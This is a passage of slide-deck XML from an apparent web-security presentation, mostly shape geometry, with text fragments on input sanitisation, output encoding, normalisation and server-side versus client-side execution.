                  <a:pt x="216797" y="3627911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184626" y="3597894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154613" y="3565719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126881" y="3531508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101551" y="3495384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78744" y="3457468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58584" y="3417882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41190" y="3376749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26686" y="3334190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15194" y="3290328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6834" y="3245284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1728" y="3199181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3152140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="630427"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="EE63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571356" y="4918988"/>
            <a:ext cx="5415915" cy="270192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7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Strips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illegal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characters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substrings</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="211454" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Uses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predictable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format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and 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arac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se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f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ntext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w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h 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output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ed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37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eck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al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7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passed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utput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37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Differentiates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between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character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sets</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pP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encod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ng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methods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243059" y="3704844"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896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727438" y="3762527"/>
            <a:ext cx="3443604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24585" marR="5080" indent="-1112520">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Normalization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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Output </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>encoding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22011" y="306451"/>
            <a:ext cx="64115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">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vs.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution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2255" y="760476"/>
            <a:ext cx="9144000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529333" y="3551682"/>
            <a:ext cx="6341745" cy="4318000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6341745" h="4318000">
                <a:moveTo>
                  <a:pt x="0" y="719581"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1530" y="672272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059" y="625780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13492" y="580198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23733" y="535624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36687" y="492150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52261" y="449872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70358" y="408886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90885" y="369285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113746" y="331164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138846" y="294619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166091" y="259745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195386" y="226635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226635" y="195386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259745" y="166091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294619" y="138846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331164" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369285" y="90885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408886" y="70358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449872" y="52261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492150" y="36687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535624" y="23733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580198" y="13492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="625780" y="6059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672272" y="1530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719582" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5621782" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669091" y="1530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5715583" y="6059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5761165" y="13492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805739" y="23733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5849213" y="36687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891491" y="52261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932477" y="70358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972078" y="90885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6010199" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6046744" y="138846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6081618" y="166091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6114728" y="195386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145977" y="226635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6175272" y="259745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6202517" y="294619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6227617" y="331164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250478" y="369285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6271005" y="408886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289102" y="449872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6304676" y="492150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6317630" y="535624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6327871" y="580198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6335304" y="625780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6339833" y="672272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6341364" y="719581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6341364" y="3597909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6339833" y="3645219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6335304" y="3691711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6327871" y="3737293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6317630" y="3781867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6304676" y="3825341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289102" y="3867619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6271005" y="3908605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6250478" y="3948206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6227617" y="3986327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6202517" y="4022872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6175272" y="4057746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145977" y="4090856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6114728" y="4122105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6081618" y="4151400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6046744" y="4178645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6010199" y="4203745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972078" y="4226606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932477" y="4247133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891491" y="4265230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5849213" y="4280804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805739" y="4293758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5761165" y="4303999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5715583" y="4311432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669091" y="4315961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5621782" y="4317492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719582" y="4317492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672272" y="4315961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="625780" y="4311432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580198" y="4303999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535624" y="4293758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492150" y="4280804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449872" y="4265230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408886" y="4247133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369285" y="4226606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331164" y="4203745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294619" y="4178645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259745" y="4151400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226635" y="4122105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195386" y="4090856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166091" y="4057746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138846" y="4022872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113746" y="3986327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90885" y="3948206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70358" y="3908605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52261" y="3867619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36687" y="3825341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23733" y="3781867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13492" y="3737293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059" y="3691711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1530" y="3645219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3597909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="719581"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="E3B36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68804" y="4367911"/>
            <a:ext cx="3392804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2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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runs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3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code.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68804" y="5085359"/>
            <a:ext cx="5029835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3535">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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supports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Document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Object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Model </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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(DOM)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scripting.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68804" y="6231026"/>
            <a:ext cx="5692140" cy="7912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3535">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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mi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ht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sen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quest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ser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v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160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,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but 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quest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construct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by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cl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ent.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413242" y="3601973"/>
            <a:ext cx="6278880" cy="4267200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6278880" h="4267200">
                <a:moveTo>
                  <a:pt x="0" y="711200"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1640" y="662503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6491" y="614688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14447" y="567860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25402" y="522125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39250" y="477589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55885" y="434357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75202" y="392536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97093" y="352232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121454" y="313549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148179" y="276595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177161" y="241475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208295" y="208295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241475" y="177161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276595" y="148179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313549" y="121454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352232" y="97093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="392536" y="75202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434357" y="55885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="477589" y="39250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522125" y="25402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567860" y="14447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614688" y="6491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662503" y="1640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5567679" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616376" y="1640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664191" y="6491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711019" y="14447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5756754" y="25402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5801290" y="39250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5844522" y="55885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5886343" y="75202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5926647" y="97093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965330" y="121454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6002284" y="148179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037404" y="177161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070584" y="208295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6101718" y="241475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6130700" y="276595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157425" y="313549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6181786" y="352232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6203677" y="392536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6222994" y="434357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6239629" y="477589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6253477" y="522125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6264432" y="567860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6272388" y="614688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6277239" y="662503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6278879" y="711200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6278879" y="3556000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6277239" y="3604696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6272388" y="3652511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6264432" y="3699339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6253477" y="3745074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6239629" y="3789610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6222994" y="3832842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6203677" y="3874663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6181786" y="3914967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157425" y="3953650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6130700" y="3990604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6101718" y="4025724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070584" y="4058904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037404" y="4090038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6002284" y="4119020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965330" y="4145745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5926647" y="4170106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5886343" y="4191997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5844522" y="4211314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5801290" y="4227949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5756754" y="4241797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711019" y="4252752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5664191" y="4260708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616376" y="4265559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5567679" y="4267200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711200" y="4267200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662503" y="4265559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614688" y="4260708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567860" y="4252752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522125" y="4241797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="477589" y="4227949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434357" y="4211314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="392536" y="4191997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352232" y="4170106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313549" y="4145745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276595" y="4119020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241475" y="4090038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208295" y="4058904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177161" y="4025724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148179" y="3990604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121454" y="3953650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97093" y="3914967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75202" y="3874663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55885" y="3832842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39250" y="3789610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25402" y="3745074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14447" y="3699339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6491" y="3652511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1640" y="3604696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3556000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="711200"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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700643" y="4393184"/>
            <a:ext cx="314261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Server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runs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code.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00643" y="5110632"/>
            <a:ext cx="5309870" cy="11715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marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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ca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tim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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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cons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min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m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y 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involve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multiple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transactions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between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server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client.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274873" y="3099625"/>
            <a:ext cx="4652010" cy="802005"/>
            <a:chOff x="9274873" y="3099625"/>
            <a:chExt cx="4652010" cy="802005"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9279635" y="3104388"/>
              <a:ext cx="4642485" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4642484" h="792479">
                  <a:moveTo>
                    <a:pt x="4510024" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132080" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132080" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024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279635" y="3104388"/>
              <a:ext cx="4642485" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4642484" h="792479">
                  <a:moveTo>
                    <a:pt x="0" y="132079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6738" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132080" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
